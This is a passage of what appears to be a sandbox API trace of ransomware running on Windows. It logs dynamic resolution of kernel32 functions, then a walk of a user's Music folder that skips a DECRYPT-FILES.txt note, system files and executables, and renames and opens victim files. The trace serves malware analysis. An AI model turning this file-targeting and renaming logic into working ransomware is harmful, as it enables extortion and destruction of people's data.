lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.243] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.243] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.243] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.243] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.243] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.243] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.243] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.243] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.243] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.243] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.243] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.243] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.243] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.244] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.244] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.244] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.244] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.244] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.244] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.244] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.244] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.244] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.244] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.244] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.244] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.244] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.244] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.244] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.244] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.244] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.244] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.244] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.245] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.245] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.245] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.245] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.245] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.245] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.245] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.245] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.245] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.245] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.245] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.245] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.245] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.245] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.245] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.245] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.245] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.245] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.246] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.246] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.246] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.246] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.246] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.246] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.246] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.246] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.246] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.246] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.246] lstrlenA (lpString="DELETEATOM") returned 10 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.246] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.246] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.246] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.246] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.246] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.246] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.246] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.246] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.247] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.247] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.247] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.247] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.247] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.247] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.247] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.247] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.247] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.247] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.247] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.247] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.247] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.247] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.247] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.247] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.247] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.247] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.247] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.248] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.248] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.248] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.248] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.248] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.248] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.248] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.248] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.248] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.248] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.248] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.248] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.248] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.248] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.248] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.248] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.249] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.249] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7NQgKG6cOq2.m4a") returned 51 [0085.249] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7NQgKG6cOq2.m4a.CBiAihw") returned 59 [0085.249] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7NQgKG6cOq2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7nqgkg6coq2.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7NQgKG6cOq2.m4a.CBiAihw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7nqgkg6coq2.m4a.cbiaihw"), dwFlags=0x0) returned 1 [0085.250] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.250] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.250] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.250] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5ce480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae5ce480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae5ce480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0085.250] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0085.250] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0085.251] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0085.251] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0085.251] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0085.251] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0085.251] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2a59480, ftCreationTime.dwHighDateTime=0x1d4cfcb, ftLastAccessTime.dwLowDateTime=0x9ffef080, ftLastAccessTime.dwHighDateTime=0x1d4cbf8, ftLastWriteTime.dwLowDateTime=0x9ffef080, ftLastWriteTime.dwHighDateTime=0x1d4cbf8, nFileSizeHigh=0x0, nFileSizeLow=0x1063, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i32QS.wav", cAlternateFileName="")) returned 1 [0085.251] lstrcmpiW (lpString1="i32QS.wav", lpString2="DECRYPT-FILES.txt") returned 1 [0085.251] lstrcmpiW (lpString1="i32QS.wav", lpString2="autorun.inf") returned 1 [0085.251] lstrcmpiW (lpString1="i32QS.wav", lpString2="boot.ini") returned 1 [0085.251] lstrcmpiW (lpString1="i32QS.wav", lpString2="desktop.ini") returned 1 [0085.251] lstrcmpiW (lpString1="i32QS.wav", lpString2="ntuser.dat") returned -1 [0085.251] lstrcmpiW (lpString1="i32QS.wav", lpString2="iconcache.db") returned -1 [0085.251] lstrcmpiW (lpString1="i32QS.wav", lpString2="bootsect.bak") returned 1 [0085.251] lstrcmpiW (lpString1="i32QS.wav", lpString2="ntuser.dat.log") returned -1 [0085.251] lstrcmpiW (lpString1="i32QS.wav", lpString2="thumbs.db") returned -1 [0085.251] lstrcmpiW (lpString1="i32QS.wav", lpString2="Bootfont.bin") returned 1 [0085.251] lstrlenW (lpString="i32QS.wav") returned 9 [0085.251] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0085.251] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0085.251] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0085.251] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0085.251] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0085.251] lstrlenW (lpString="i32QS.wav") returned 9 [0085.251] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0085.251] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="i32QS.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\i32QS.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\i32QS.wav" [0085.251] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\i32QS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i32qs.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0085.252] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=4195) returned 1 [0085.252] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, 